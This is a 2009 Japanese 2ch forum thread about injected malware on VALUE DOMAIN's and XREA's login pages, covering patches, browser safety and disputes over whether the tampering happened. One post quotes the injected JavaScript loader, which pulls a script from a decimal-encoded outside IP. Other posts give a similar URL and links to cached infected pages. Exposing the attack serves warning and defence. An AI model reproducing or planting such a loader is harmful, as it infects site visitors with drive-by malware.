外部拡張に頼らず本体機能だけでプラグインのON/OFFを切り替えられるから、そういう意味ではかなり便利 396 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 03:49:43 0] >>394 ドメイン毎に設定できるのが魅力だけど 許可サイトに加えていくなど、ある程度熟練した人向けだと思う しっかり設定しないと、動画も表示されないからね 397 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 03:50:45 0] >>393 変なActiveXだけじゃなく変なPDFと変なSWFもあったみたいだよ どれかにヒットすれば感染おめでとう サーバ側についてはGenoと同じでなかったことにしようとしてるみたいだね 価格.comの改悪型Genoメソッドだ 他の攻撃サイトでもIEをターゲットにしているものは多いし IEをメインブラウザとして使うのは危ないね 398 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 03:59:23 0] 　　　　　　　　　　　　 ／） 　　　　　　　　　　　／／／） 　　　　　　　　　 ／,.=ﾞ''"／ 　　　／　　　　 i f　,.r='"-‐'つ＿＿＿_　　　キャッシュ消せばいいんだよ！ 　　/　　　　　 /　　　_,.-‐'~／⌒　　⌒＼ 　　　　／　 　,i　　　,二ﾆ⊃（ ●）.　（●）＼ 　　　/　 　　ﾉ　　　 ilﾞフ::::::⌒（__人__）⌒::::: ＼ 　　　　　　,ｲ｢ﾄ､　　,!,!|　　　　　|r┬-|　　　　　| 　　　　　/　iﾄヾヽ_/ｨ"＼ 　　 　 `ー'´ 　 　 ／ 399 名前：動揺激しい、さくらスレに誤爆したｗ mailto:sage [2009/07/08(水) 04:10:16 0] thx、何でGENOの話をしてるのか分かってなかった。 pdf,swfもあったのね。 　login.phpが書き換えられた。 　 　�@ 変なJavaScriptが埋め込まれてる。 　　　　→ 変なActiveXが実行される。 　　　　　→ IEの人は要注意。（魚拓も危険） 　　　　　　→ ともかく全員これを当てておけ。 ttp://support.microsoft.com/kb/972890 　　　　→ 変な pdf と swf を読まされる。 　　　　　→ 例のGENO系。既に最新のAdobeReaderとFlashPlayerになってるよな！？ 　　　　　　→　Adobe製品は自動更新間隔の期間が長いので、常に自分で最新を当てにいけ。 　 　�A login.phpが書き換えられたって事は… 　　　　→ ログイン危険。 　　　　→ というか、何もかもやばいだろ＼(＾o＾)／ 400 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 04:14:03 0] >>396 そうなんだよね わけわかめな人についてはNoScriptは入れないほうが良いとおもう ただ、IEが一番狙われてるのは確実だからNoScriptなしでも Firefox(その他のブラウザ含む)のがマシと考えられる Firefoxに関してはGoogleセーフブラウジングである既知の危険ドメインは カットできるんでそういう意味でも多少安全 IE8にもそういう機能がついてるけど踏まないと報告できないようなので 少なくとも一回罠にかからなきゃいけないんだよね・・・ それとも見落としていただけで報告サイトあるんだろうか どっちみち今回のような未知のドメインには対応してないので基本的な対策は必要だけどね ただ、Firefoxが良いから使えっていうポジティブな理由じゃなく IEが危なすぎるからやめろっていうネガティブな理由なんで他ブラウザでも構わない Google Chromeはたとえブラウザの脆弱性があったとしても サンドボックス化されていて実行する権限が無いので動かないみたいな話だったかな 401 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 04:18:55 0] このあたりに今回の件が書いてある ttp://ilion.blog47.fc2.com/blog-entry-140.html ttp://www.st.ryukoku.ac.jp/~kjm/security/memo/2009/07.html#20090707_tuiki ttp://lineage.paix.jp/guide/security/virus-site.html#VALUEDOMAIN 402 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 04:19:26 0] >>399 ここの人は大丈夫だと思うけど、念のためGeno関連補足 AdobeReaderに関しては今後また狙われそうなJavaScript機能のオフ推奨 また、Reader自体使用していないならアンインストールしたほうが無難 メーカー製PCの場合は勝手に入ってることが多いので使用していなくても インストールされていないか要確認 403 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 04:39:35 0] これってreader入れてなければflashプレイヤー入ってても感染しないの？ 404 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 04:40:40 0] >>399 これってブラウザのスクリプト切ってても感染するの？ 405 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 04:42:23 0] >403 だから FlashPlayer は最新にしろとあれほど 406 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 05:11:23 0] 要するにAdobe私ねってことだ 407 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 06:27:28 0] >>405 してるよ。 IE6 flashplayer最新 reader無し 408 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 06:52:32 0] ttp://support.microsoft.com/kb/972890/ をやってないならアウト 409 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 07:12:59 0] >>408 やってないみたいだけど感染してるかどうかってどこで見分けるの？ GENOウイルスはレジストリエディタが立ち上がらなくなるって聞いたけど立ち上がるし アプリケーションが糞重くなるって聞いたけど特に変化無いし PeerGurdian2で見てても特に変な動きしてないみたいなんだけど。 410 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 07:22:13 0] 動画見ないからそもそもフラッシュのプラグイン入れてないなｗ 411 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 08:00:03 0] 横になったら寝てた >>400 ＞Firefoxに関してはGoogleセーフブラウジングである既知の危険ドメインは カットできるんでそういう意味でも多少安全 寝る前に、そういうサイト踏んだら、そうなった 今IE7でやってみたら、危険なドメイン開いた >>408やってなかったからか 412 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 08:11:37 0] >>409 バックドアかキーロガーだから見つかりにくいように作ってるだろう。 regeditが起動しないみたいなあからさまな挙動はない。 私は感染してないので、がんばって見分け方を見つけてね。 413 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 08:24:11 0] 見分け方は、sqlsodbc.chmのファイルサイズの確認でしょう >>411はただのエロサイトだった それを今回のアドレスでやればいいのかな 414 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 09:15:22 0] うっかり砂箱の中で>>408やったらループった 試すアドレスは >>286のでいいのか FireFox、Chromeはブロックしてくれたけど IEが接続できなきないだけで、もう一つ分からない IE８にしないと駄目か 415 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 10:01:07 0] IE8にしてみたけどInternet Explorer ではこのページは表示できません って出るから、これだとブロックしてくれてるのかどうか分からん うちのモデムの接続もともと不具合だし 416 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 10:05:43 0] なんでここがさくらのサーバ使ってんのかと思ったら、 自前のだと良く落ちるからかな？ 417 名前：名無しさん＠お腹いっぱい。 [2009/07/08(水) 10:06:38 0] で、結局何？今回の騒動は釣りじゃないのか？ なんか最近思うんだが、ムームードメインとお名前が必死じゃないか？ おれはムームーでのcomドメイン管理を止めた。 使い勝手の悪いムームードメインから デザインが悪くても管理の楽なバリュードメインにしたよ。 おれと同じようなユーザーは多数いるだろうね。 今回の件、ムームー社員が工作しているように見えるから不思議。 418 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 10:10:07 0] それより、お前らどこに引っ越したんだよ 419 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 10:10:41 0] ■Slashdot.jp VALUE DOMAIN のログイン ページ改ざん ttp://slashdot.jp/firehose.pl?op=view&id=117594 ■リネージュ資料室 VALUE DOMAINログインページ改竄 ttp://lineage.paix.jp/guide/security/virus-site.html#VALUEDOMAIN ■セキュリティホールMEMO バリュードメインでこの欠陥を利用した攻撃が発生 ttp://www.st.ryukoku.ac.jp/~kjm/security/memo/2009/07.html#20090707_tuiki 420 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 10:14:45 0] 早く公表してくれ 5000人以上の個人情報を保有しているだろうから法的に裁かれるぞ 今回の件ばかりは隠すことは出来ない 下手すれば・・・ 421 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 10:16:01 0] ｺﾞｸﾘ... 422 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 10:28:29 0] 釣られないぞ・・・ 423 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 10:34:25 0] 問題が発生した時点でのウイルス検体を拾った人が大勢いる あとになればなるほど、返答に窮するようになるかもしれないのに、何をやってるんだ zxshell晒しsage 424 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 10:35:55 0] おっと早漏 △ウイルス検体を拾った人 ○ウイルス検体を(騒動を察知してわざわざ)拾いにいった人 425 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 10:53:53 0] 中国か、GMOに身売りになったらイヤだな 426 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 11:06:16 O] デジロウイルスのアナウスまだぁ? 427 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 11:35:27 0] 対策してて大丈夫な人、ここ見ても平気か試してくれよ ttp://dnf.wikiwiki.jp/ 428 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 12:01:22 0] ttp://so.7walker.net/index.php?site=http%3A%2F%2Fwww.wikiwiki.jp%2Ferror%2F403.html&hua= 上のソースで問題の部分は./er/pr.phpだよね 429 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 12:03:55 0] どうしちゃったんだよVALUEDOMAIN… 430 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 12:07:38 0] >>428はURL間違ってね？ 431 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 12:22:32 0] デジロックは公式アナウンスをしない気か？ GIGAZINEとか他のニュースサイトでも取り上げてくれれば、 ニュー速とかにスレが立って、デジロも無視できない状態になるだろうに・・・。 あー、乗り換えるのめんどうだし、デジロックには頑張ってほしいよ。 432 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 12:26:31 0] 公式アナウンスしないっていうより、できないのかも 何が起こったのか把握できる技術者が外注にもいないんだよ、きっと 433 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 12:29:40 0] デジロが無視できない状態にしたいのであれば、 国に動いてもらえばよかろう 434 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 12:41:50 0] 国に動いてもらいたいなら正式に通報しろよ 誰もやってないんだろ 435 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 12:44:57 0] >>430 ＞URL間違ってね？ って、そういう意味か >>427のソースはこっち view-source:dnf.wikiwiki.jp/ >>428で問題だったインラインフレームタグって ./er/pr.phpだろう？ まったく同じのはなかったけど それで安全ってことでいいのか？ こっちはiframeどころかHTMLも碌に 知らないんだから分かる人よろしく 直踏みの感想は特に問題なかったけど 当方の環境で問題なしとしか言えない 436 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 12:47:22 0] >>434 誰もやってないだろうね ここのユーザーは、基本的に法の知識も低い傾向があるしな 437 名前：名無しさん＠お腹いっぱい。 [2009/07/08(水) 12:51:27 0] >>436 お前とかな 438 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 12:54:07 0] お子様が紛れ込んでいるようです。 439 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 12:54:28 0] 法の知識が低いとなんかまずいのかね？ 頭でっかちの知識自慢は嫌われますよ〜 440 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 12:56:55 P] >>436 ググレカスの人ですか？ 441 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 13:00:04 0] んで今はどんな状況よ FTP侵入 ↓ サイト改竄 ↓ ウイルス埋め込み だけならいいが、 FTPに入られてDBに接続するプログラムを見て、 DBの顧客情報をもってかれていたら終了だろ 442 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 13:03:45 0] 関係あるかな？ 韓国で大規模サイバー攻撃、大統領府など被害 ttp://www.nikkei.co.jp/news/main/20090708AT2M0800Z08072009.html 443 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 13:04:07 0] アナウンスないと、突っ込んだ話は正直わからないよねぇ 444 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 13:05:49 0] >>440 >>141で規約に謳ってあると言われて いなくなっちゃったよ ソース>>142 445 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 13:19:02 0] 規約の「責任の限界」の内容って、「無責任」とどう違うのかだれか教えて 446 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 13:42:26 0] >>445 責任と取るべく努力はするが、ダメだったら許してね ってことだが、実態は無責任に近いなｗ さすがにサーバー落ちたとかそういうレベルじゃなく、資産が他人に盗まれる 可能性を含んだ問題だからなぁ、fc2かgodaddyにでも移動するか・・・ 447 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 13:47:29 0] ネームサーバ障害の徹底放置しかり、この状況下で移管は止めんが移管先の話は 該当スレでどうぞ。 デジロ社員といつもの頭おかしい子の「他社工作員乙」ってワードの呼び水になるん でそういう話は該当スレで頼む。 448 名前：名無しさん＠お腹いっぱい。 [2009/07/08(水) 13:49:52 0] レンタルアクセス解析サービス　謎のあやしい文字　＆　う　・・・ いまは、でない。気のせいだったのか・・・　気のせいだったんだろうなぁ でも、どこででたんだろう・・・　いまいち記憶が・・・ 449 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 13:56:22 0] 今のとこ実害報告ないけど、実際に実害報告出だしたらどう命名されるんだろ DigiRoウイルス かなぁ？ 450 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 13:59:25 0] 大阪ウィルスだろｗｗ 451 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 14:03:15 0] 移管しようにも怖くてログインすらできんのだが… ある程度の安全が確保されてから全移管する 452 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 14:19:20 0] >>451 全部一気に移管するならログインしても問題ないだろ 終わってしまえばもう関係ないんだからさ 453 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 14:35:39 0] 俺も怖くてログインできないクチなんだよな… 入金したから、その申請をしたかったんだが… 正式なアナウンスしないつもりなのかな？ 454 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 14:42:42 0] ある程度まとまった数のユーザーに実際の被害が出なけりゃこのまま黙殺だろ 被害が出たらそりゃ凄い事になりそうだけどなｗ 455 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 14:43:05 0] ソースは２ちゃんとか走りすぎじゃない？ 何処も自身で確認した訳でもなく、そーすは２ちゃんって言ってるじゃん しかも個人ブログとかどう信用しろっていうんだ >>451 俺ログインしまくってるけど特になにもないよ 456 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 14:45:43 0] 何か言う前に同一スレ内くらいざっと読めよ 457 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 14:46:10 0] 仮に改竄時にパスを抜かれてたとしてだ、 現時点でコード削除されていて、再発していないということは、デジロ側で抜かれたパス変更してるはず。 なんで待ってないでさっさとログインしてパス変えちゃえば心配ないと考える。 むしろ何かされるの待ってる方がマゾ。 458 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 14:49:38 0] >>456 スレ全部読んだけど、上でも誰かいってたけど原爆ネタと同じ流れじゃん 魚拓も含めて。 459 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 14:50:18 0] 前にxreaで運営しているネトゲサイトだかなんだかにスクリプト埋め込まれたのも同じ方法じゃないか？ あんときは　ｈｔｔｐ:／／１０３９０４５７４４：８８／ｊｐ.ｊｓ　だったけど xreaはこんときスクリプトの脆弱性をついたXSSって発表してるから今回もそうかね？ だとしたら間抜け以外の何モンでもないな ttp://sb.xrea.com/showthread.php?p=84465 460 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 14:51:01 0] ミスリードにも程がある 461 名前：名無しさん＠お腹いっぱい。 [2009/07/08(水) 14:52:00 0] コンタクトフォームで聞いたが、 -------------------------------------------------------------------- お世話になっております。 お問い合わせについてですが、先ほど問題無くログイン可能でございました。 セキュリティソフトなどの警告も無く、現状ではユーザー様から連絡いただいた症状を確認できませんでした。 ご確認の上、適宜ご作業いただければ幸いです。 --------------------------------------------------------------------- 「現状ではユーザー様から連絡いただいた症状を確認できませんでした。」 と言う言葉を信じるなら、ガゼじゃないのか？ 妬みを持つユーザーから 462 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 14:54:48 0] godaddyは以前クラックされてたよな。 FC2は安いしVDに近い操作ができそうだが、実際どうなのかな 463 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 14:58:21 0] こんな時に何だけど、ネームサーバ障害はやっぱり完全放置なんだよね？ 464 名前：460 mailto:sage [2009/07/08(水) 15:01:29 0] サポートに質問してみたら速攻レスきて驚いた・・・ [2009-07-08 14:51:02] サポートからメッセージが追加されました。 お世話になっております。 お問い合わせについてですが、弊社にてサポート業務などにおいて数分単位でログインページは常時確認しております が、ユーザー様よりご連絡いただいている「改竄」は確認できませんでした。 ご確認の上、適宜ご作業いただければ幸いです。 ２ちゃんを信じるか公式のコメントを信じる最終的には個々の判断だけど もし事実じゃないとしたら、いくら２ちゃんねるだからといって悪質にも程があると思う。 ミスリードに釣られて煽った人間も同罪。 465 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 15:02:35 0] 魚拓はどうなの 怖くてみれない 466 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 15:04:54 0] >>465 スレの内容どおりだよ、マルウェアが仕込まれたjsファイルへのリンクが埋め込まれてる ブラウザのjavascriptを切った状態でアクセスしてソースを確認すればいい 467 名前：名無しさん＠お腹いっぱい。 [2009/07/08(水) 15:08:26 0] やはり、改竄はなかった。サポートが正式回答しているではないか。 他社工作員乙。捏造するにも程がある。いい加減にしろ。 468 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 15:13:06 0] firefox+Noscriptで魚拓見てきたけど たしかにあったねs.jsっていうの この魚拓URL見せたらなんて言うんだろう？ 469 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 15:14:02 0] ソースのログインフォームの下あたりだよね 470 名前：名無しさん＠お腹いっぱい。 [2009/07/08(水) 15:16:09 0] 魚拓が捏造でしょ デジロが正式アナウンスしない限り、他社工作員の捏造 471 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 15:19:40 0] 改ざんされて被害にあったっていってたひとがふしあなで書き込むといいんじゃない？ 472 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 15:20:31 0] 捏造って流れで押そう！ ってのがトレンドなんだｗ 473 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 15:21:27 0] ホメ殺しでしょ、極端なデジロ擁護で逆に反感を煽ってるんだよ 474 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 15:23:52 0] ははｗｗ 前スレ終盤あたりからだよねその流れｗｗ 475 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 15:23:53 0] 極端なデジロ擁護っていうのがよくわからない 476 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 15:23:58 0] 魚拓が捏造可能って話にしちゃうとそれはそれですごい面倒な話になる気がする 477 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 15:27:07 0] 社員乙っていわれるようにレスしてんじゃないの 原爆の時みんなにスルーされてたやつじゃない？ 478 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 15:27:35 0] 魚拓がねつ造可能だと通報しろ。そっちの方が世間的には盛り上がるぞｗ 479 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 15:28:59 P] >>462 FC2は複数のドメイン管理で切り替えが必要な時点でクソ。 個人的にはムームーの方がよっぽど使いやすいレベル。 480 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 15:29:19 P] おれ、リアルタイムで人柱やった。当時、その追加されてるソースも確認した。 で、>>464の報告が事実だと仮定して、サポートが「確認できなかった」のが本当ならば、 仕掛けた本人が消したか、もしくはデジロックの担当部署が当該ソースを削除して、 サポートにその申し送りがされてないとしか考えられない。 とことん「改竄がなかった」ことにしたい輩がいるけれど、 俺から見れば、むしろそうやってうやむやにしたい奴のほうが悪質に見える。 >>473 その可能性はあるね。頭がおかしいとしか言いようがない。 481 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 15:33:49 0] 自分で確認できなかった事と事実をなかったことにしろっていうのは違うだろ。 公式がないって言ってんのを名無しを信じろっていうほうが無理だろ 482 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 15:34:15 0] なかったことにしたい人が必死すぎてこわい 483 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 15:34:58 0] 俺から見れば名無しで書き込んで、信じろっていうやつのほうが頭おかしいと思うが 484 名前：名無しさん＠お腹いっぱい。 [2009/07/08(水) 15:35:42 0] >>480 お金を取って、ログまで残して回答してるのと、 2chのどっちを信るかろと言えば、前者だろ。 ちょっと考えれば、value-domainってlocalアドレスを 自分のPCで書き換えれば、URI付き魚拓なんて捏造いくらでもできるからな。 絶対ガセ 485 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 15:35:51 0] >>482 頭大丈夫？ 486 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 15:36:06 0] 名無しの問題じゃなくて、魚拓の信頼性だろ 487 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 15:36:48 0] どうせわざとやってんだから相手にすんなよ 488 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 15:38:47 P] >>481 そんなこと言うなら、 「公式がないって言ってる」という情報源だって名無しだろうが 489 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 15:40:23 0] 急にP付で書き込んでてﾌｲﾀｗ 恥を知れｗ 490 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 15:42:04 0] >>484 それ自分はだませるけど魚拓側のリゾルバはだませないだろ？ 491 名前：名無しさん＠お腹いっぱい。 [2009/07/08(水) 15:43:50 0] ガセを流した方々へ コンタクトフォームで問い合わせしてるやしまで現れて、 デジロックは無駄な労力使ってる。 そろそろ許してやれよなーー 492 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 15:44:45 0] ActiveX…恐ろしい子っ！ 493 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 15:44:54 0] >>490 localhost value-domain.com でいいんでない？ 494 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 15:45:39 P] >>481 まあいいや。 君が善意の第三者と仮定するなら、君の言い分も分からないではない。 ただソースをこの目で確認した俺からすれば、隠蔽工作をしているデジロックに 対して心底腹が立つ。 てか俺、完璧釣られてるのかな。 495 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 15:46:24 0] >>493 魚拓のコンテンツ取得って魚拓のサーバーがやってるんだから ローカルのホスト情報関係ないと思ったんだけどそういう仕組みじゃないんだっけ？ 496 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 15:46:29 0] >>493 魚拓サイトのサーバにそれをどうやって書き込むの？ 自分のPCだけだよそれで騙せるのは 497 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 15:48:00 0] 魚拓というアーカイバーか。なるほど。 498 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 15:48:17 0] 被害にあったっていうならふしあなで書き込めばいいんじゃない？ そうすれば擁護の連中も信じるかもよ？ >おれ、リアルタイムで人柱やった。当時、その追加されてるソースも確認した。 >で、>>464の報告が事実だと仮定して、サポートが「確認できなかった」のが本当ならば、 >仕掛けた本人が消したか、もしくはデジロックの担当部署が当該ソースを削除して、 >サポートにその申し送りがされてないとしか考えられない。 499 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 15:48:27 0] >>494 ええ、釣られてると思いますよ 500 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 15:49:08 0] >>494 ヒント：現在勤務時間中 501 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 15:50:05 0] ID出れば社員がわかって便利なのに不便だな 502 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 15:52:13 0] お待ちかねの社員乙のタイミングですねｗ わざわざご苦労さま 503 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 15:53:08 0] ガセ情報を流しているのは社員の方ですね 504 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 15:53:16 P] >>499-500 だよねぇ・・・。 >>498 べつにやってもいいけど、何の根拠にもならんだろ。 相手が善意の第三者でないなら尚更のこと。 505 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 15:55:31 0] 意味がわからない・・・ 506 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 15:57:04 P] いっそまちBBSとか、全員強制IPのところでやれば面白い。 507 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 15:57:37 O] まぁ、そのうちにドメイン乗っ取りが開始されれば、少しはここも静かになるわな。 508 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 15:57:52 0] WEB魚拓の中の人に連絡してみる どっちかが捏造してるんだろ？それは罪を問われるべき 509 名前：508 [2009/07/08(水) 16:00:36 0] デジロの捏造だとしたら救いようない問題だし WEB魚拓経由で捏造してウィルス撒いてるとしても問題 これは白黒つけるべき 510 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:01:34 0] ややこしくなるからお前もうでてくんなよ 511 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:01:49 P] あ、関係ないかもしれないけど、 今XREAのアクセスアナライザー　ttp://ax.xrea.com/ のログイン画面で、アバスト反応した。 ↓こんなんみたいだけど。 JS:CVE-2008-0015-A [Expl] これって今回の騒動は関係ない？ 512 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:03:09 0] >>511 ある！　同じjsが 513 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:04:14 0] うわ！マジで居る 見に行くならスクリプト切っていけよ 514 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:04:42 0] >>511 </head>タグのちょうどうえ <SCRIPT LANGUAGE="JAVASCRIPT"> var js = document.createElement('script'); js.src ="ｈｔｔｐ://1856317799:888/ｊｐ．ｊｓ"; try {document.getElementsByTagName('head')[0].appendChild(js);} catch(exp){} js = null; </SCRIPT> </HEAD> 515 名前：511 mailto:sage [2009/07/08(水) 16:06:11 P] どうも。アバスト反応して、入る前にすぐ削除したけどびっくりしたわ。>>511 昨日の昼ぐらいまでは、こんなん反応しなかったハズ。 516 名前：511 mailto:sage [2009/07/08(水) 16:08:03 P] 今もうPCの電源落としてアドエスからP2経由でレスしてるんで、 魚拓等必要あれば誰かたのんますー。 517 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:08:07 O] デジロ社員はこんなとこで遊んでないで… とっととデジロウイルスの対策をしろよ 518 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:09:17 0] login.phpにあるの？今ソース確認中 519 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:09:26 0] IE使ってる人は要注意だなこりゃ 520 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:10:11 0] >>518 違う、>>511 をよく読め 521 名前：名無しさん＠お腹いっぱい。 [2009/07/08(水) 16:10:15 0] この人病気なんかな・・・ 522 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:10:57 0] value-domainの方は大丈夫だねさすがに 523 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:12:05 0] ログイン画面じゃなくてトップページじゃない？ 524 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:12:58 0] なくなった… 525 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:13:36 0] トップページとログイン画面のソース見たけど >>514に書かれてるやつなかったよ。別のページなのかな 526 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:14:11 0] たしかに貼られた直後見に行ったけど無かった すでに消されてたのか？ 527 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:14:16 0] まだ残ってるよ いい加減なこと言うな 528 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:14:24 0] >>525 いやもうない 529 名前：名無しさん＠お腹いっぱい。 [2009/07/08(水) 16:14:33 0] おいｗふざけるのもいい加減にしろｗ >>511みてすぐ行ったけど確認できなかったぞ！ 釣られた俺が恥ずかしいだろうがあああああああああああああああ！ｗｗｗ 530 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:15:53 0] 自分も見つからなかったが、>>511が書き込まれた直後に対策されたか？ ソースチェッカーオンラインでは16:11にチェックされたキャッシュが残っていて、そこでは不正コードが確認できる ttp://so.7walker.net/?site=http%3A%2F%2Fax.xrea.com%2Flogin.php&hua= （魚拓と違っていつまでこの不正コード入りキャッシュが残ってるかは不明 531 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:15:55 0] 